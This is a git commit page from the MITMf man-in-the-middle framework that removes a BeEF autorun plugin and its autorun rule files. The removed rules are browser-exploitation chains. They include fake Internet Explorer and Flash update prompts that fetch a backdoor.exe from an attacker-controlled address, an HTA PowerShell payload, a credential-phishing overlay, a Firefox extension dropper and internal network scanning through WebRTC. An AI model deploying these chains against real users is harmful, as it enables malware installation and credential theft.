mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-16 10:03:52 -07:00
Removed beefautoplugin since it's pretty useless now with BeEF's ARE engine
removed check to enable IP forwarding using sysctl
This commit is contained in:
parent
77fc00539e
commit
24070afbd0
11 changed files with 4 additions and 300 deletions
|
@ -1,35 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Test return debug stuff",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "S",
|
|
||||||
"browser_version": ">= 7",
|
|
||||||
"os": "OSX",
|
|
||||||
"os_version": "<= 10.10",
|
|
||||||
"modules": [{
|
|
||||||
"name": "test_return_ascii_chars",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}, {
|
|
||||||
"name": "test_return_long_string",
|
|
||||||
"condition": "status==1",
|
|
||||||
"code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
|
|
||||||
"options": {
|
|
||||||
"repeat": "10",
|
|
||||||
"repeat_string": "<<mod_input>>"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "alert_dialog",
|
|
||||||
"condition": "status=1",
|
|
||||||
"code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
|
|
||||||
"options":{"text":"<<mod_input>>"}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "get_page_html",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}],
|
|
||||||
"execution_order": [0, 1, 2, 3],
|
|
||||||
"execution_delay": [0, 0, 0, 0],
|
|
||||||
"chain_mode": "nested-forward"
|
|
||||||
}
|
|
3
config/beef_arerules/enabled/.gitignore
vendored
3
config/beef_arerules/enabled/.gitignore
vendored
|
@ -1,3 +0,0 @@
|
||||||
*
|
|
||||||
!.gitignore
|
|
||||||
!README
|
|
|
@ -1,2 +0,0 @@
|
||||||
Move here the ARE rule files that you want to load into BeEF.
|
|
||||||
Make sure they are .json files (any other file extension is ignored).
|
|
|
@ -1,20 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Firefox Extension Dropper",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "FF",
|
|
||||||
"browser_version": "ALL",
|
|
||||||
"os": "OSX",
|
|
||||||
"os_version": ">= 10.8",
|
|
||||||
"modules": [{
|
|
||||||
"name": "firefox_extension_dropper",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"extension_name": "Ummeneske",
|
|
||||||
"xpi_name": "Ummeneske",
|
|
||||||
"base_host": "http://172.16.45.1:3000"
|
|
||||||
}
|
|
||||||
}],
|
|
||||||
"execution_order": [0],
|
|
||||||
"execution_delay": [0],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,28 +0,0 @@
|
||||||
{"name": "Get Internal IP (WebRTC)",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "FF",
|
|
||||||
"browser_version": ">= 31",
|
|
||||||
"os": "Linux",
|
|
||||||
"os_version": "ALL",
|
|
||||||
"modules": [
|
|
||||||
{"name": "get_internal_ip_webrtc",
|
|
||||||
"condition": null,
|
|
||||||
"code": null,
|
|
||||||
"options": {}
|
|
||||||
},
|
|
||||||
{"name": "internal_network_fingerprinting",
|
|
||||||
"condition": "status==1",
|
|
||||||
"code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
|
|
||||||
"options": {
|
|
||||||
"ipRange":"<<mod_input>>",
|
|
||||||
"ports":"80",
|
|
||||||
"threads":"5",
|
|
||||||
"wait":"2",
|
|
||||||
"timeout":"10"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
"execution_order": [0,1],
|
|
||||||
"execution_delay": [0, 0],
|
|
||||||
"chain_mode": "nested-forward"
|
|
||||||
}
|
|
|
@ -1,31 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Ie Fake Notification + Clippy",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": "== 11",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": ">= 7",
|
|
||||||
"modules": [
|
|
||||||
{
|
|
||||||
"name": "fake_notification_ie",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
|
|
||||||
}
|
|
||||||
}
|
|
||||||
,{
|
|
||||||
"name": "clippy",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"clippydir": "http://172.16.45.1:3000/clippy/",
|
|
||||||
"askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
|
|
||||||
"executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
|
|
||||||
"respawntime":"5000",
|
|
||||||
"thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
],
|
|
||||||
"execution_order": [0,1],
|
|
||||||
"execution_delay": [0,2000],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,27 +0,0 @@
|
||||||
{
|
|
||||||
"name": "HTA PowerShell",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": "ALL",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": ">= 7",
|
|
||||||
"modules": [
|
|
||||||
{
|
|
||||||
"name": "fake_notification_ie",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "hta_powershell",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"domain":"http://172.16.45.1:3000",
|
|
||||||
"ps_url":"/ps"
|
|
||||||
}
|
|
||||||
}],
|
|
||||||
"execution_order": [0,1],
|
|
||||||
"execution_delay": [0,500],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,27 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Fake missing plugin + Pretty Theft LinkedIn",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": ">= 8",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": "== XP",
|
|
||||||
"modules": [{
|
|
||||||
"name": "fake_notification_c",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"url": "http://172.16.45.1:3000/updates/backdoor.exe",
|
|
||||||
"notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
|
|
||||||
}
|
|
||||||
}, {
|
|
||||||
"name": "pretty_theft",
|
|
||||||
"condition": null,
|
|
||||||
"options": {
|
|
||||||
"choice": "Windows",
|
|
||||||
"backing": "Grey",
|
|
||||||
"imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
|
|
||||||
}
|
|
||||||
}],
|
|
||||||
"execution_order": [0, 1],
|
|
||||||
"execution_delay": [0, 5000],
|
|
||||||
"chain_mode": "sequential"
|
|
||||||
}
|
|
|
@ -1,35 +0,0 @@
|
||||||
{
|
|
||||||
"name": "Test return debug stuff",
|
|
||||||
"author": "antisnatchor",
|
|
||||||
"browser": "IE",
|
|
||||||
"browser_version": "<= 8",
|
|
||||||
"os": "Windows",
|
|
||||||
"os_version": ">= XP",
|
|
||||||
"modules": [{
|
|
||||||
"name": "test_return_ascii_chars",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}, {
|
|
||||||
"name": "test_return_long_string",
|
|
||||||
"condition": "status==1",
|
|
||||||
"code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
|
|
||||||
"options": {
|
|
||||||
"repeat": "10",
|
|
||||||
"repeat_string": "<<mod_input>>"
|
|
||||||
}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "alert_dialog",
|
|
||||||
"condition": "status=1",
|
|
||||||
"code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
|
|
||||||
"options":{"text":"<<mod_input>>"}
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"name": "get_page_html",
|
|
||||||
"condition": null,
|
|
||||||
"options": {}
|
|
||||||
}],
|
|
||||||
"execution_order": [0, 1, 2, 3],
|
|
||||||
"execution_delay": [0, 0, 0, 0],
|
|
||||||
"chain_mode": "nested-forward"
|
|
||||||
}
|
|
|
@ -21,7 +21,6 @@ import logging
|
||||||
import re
|
import re
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
from commands import getstatusoutput
|
|
||||||
from core.logger import logger
|
from core.logger import logger
|
||||||
from core.proxyplugins import ProxyPlugins
|
from core.proxyplugins import ProxyPlugins
|
||||||
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
|
from scapy.all import get_if_addr, get_if_hwaddr, get_working_if
|
||||||
|
@ -35,15 +34,10 @@ def shutdown(message=None):
|
||||||
sys.exit(message)
|
sys.exit(message)
|
||||||
|
|
||||||
def set_ip_forwarding(value):
|
def set_ip_forwarding(value):
|
||||||
status, result = getstatusoutput('sysctl --help')
|
log.debug("Setting ip forwarding to {}".format(value))
|
||||||
if status == 0:
|
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
|
||||||
log.debug("Setting ip forwarding to {} using sysctl".format(value))
|
file.write(str(value))
|
||||||
os.system('sysctl -w net.ipv4.ip_forward={} &> /dev/null'.format(value)) #for OSX
|
file.close()
|
||||||
else:
|
|
||||||
log.debug("Setting ip forwarding to {}".format(value))
|
|
||||||
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file:
|
|
||||||
file.write(str(value))
|
|
||||||
file.close()
|
|
||||||
|
|
||||||
def get_iface():
|
def get_iface():
|
||||||
iface = get_working_if()
|
iface = get_working_if()
|
||||||
|
|
|
@ -1,82 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
import os
|
|
||||||
import pyinotify
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.inject import Inject
|
|
||||||
from core.beefapi import BeefAPI
|
|
||||||
|
|
||||||
class BeefAutorun(Inject, Plugin):
|
|
||||||
name = "BeEFAutoloader"
|
|
||||||
optname = "beefauto"
|
|
||||||
desc = "Injects BeEF hooks & manages BeEF's ARE rule loading"
|
|
||||||
version = "0.4"
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.ip_address = options.ip
|
|
||||||
beefconfig = self.config['MITMf']['BeEF']
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
|
|
||||||
|
|
||||||
beefconfig = self.config['MITMf']['BeEF']
|
|
||||||
|
|
||||||
from core.utils import shutdown
|
|
||||||
beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
|
|
||||||
if not beef.login(beefconfig['user'], beefconfig['pass']):
|
|
||||||
shutdown("[BeEFAutorun] Error logging in to BeEF!")
|
|
||||||
|
|
||||||
self.tree_info.append('Starting RuleWatcher')
|
|
||||||
RuleWatcher(beef, self.log).start()
|
|
||||||
|
|
||||||
def options(self, options):
|
|
||||||
pass
|
|
||||||
|
|
||||||
class RuleWatcher(pyinotify.ProcessEvent):
|
|
||||||
|
|
||||||
def __init__(self, beef, logger):
|
|
||||||
pyinotify.ProcessEvent.__init__(self)
|
|
||||||
self.beef = beef
|
|
||||||
self.log = logger
|
|
||||||
|
|
||||||
def process_IN_MODIFY(self, event):
|
|
||||||
self.log.debug('Detected ARE rule change!')
|
|
||||||
for rule in self.beef.are_rules.list():
|
|
||||||
self.log.debug('Deleting rule id: {} name: {}'.format(rule.id, rule.name))
|
|
||||||
rule.delete()
|
|
||||||
|
|
||||||
if event.src_path.endswith('.json'):
|
|
||||||
self.log.debug('Detected ARE rule modification/addition!')
|
|
||||||
for rule in os.listdir('./config/beef_arerules/enabled'):
|
|
||||||
if rule.endswith('.json'):
|
|
||||||
rule_path = './config/beef_arerules/enabled/' + rule
|
|
||||||
self.log.debug('Adding rule {}'.format(rule_path))
|
|
||||||
self.beef.are_rules.add(rule_path)
|
|
||||||
|
|
||||||
def start(self):
|
|
||||||
wm = pyinotify.WatchManager()
|
|
||||||
wm.add_watch('./config/beef_arerules/enabled', pyinotify.IN_MODIFY)
|
|
||||||
notifier = pyinotify.Notifier(wm, self)
|
|
||||||
|
|
||||||
t = threading.Thread(name='RuleWatcher', target=notifier.loop)
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
Loading…
Add table
Add a link
Reference in a new issue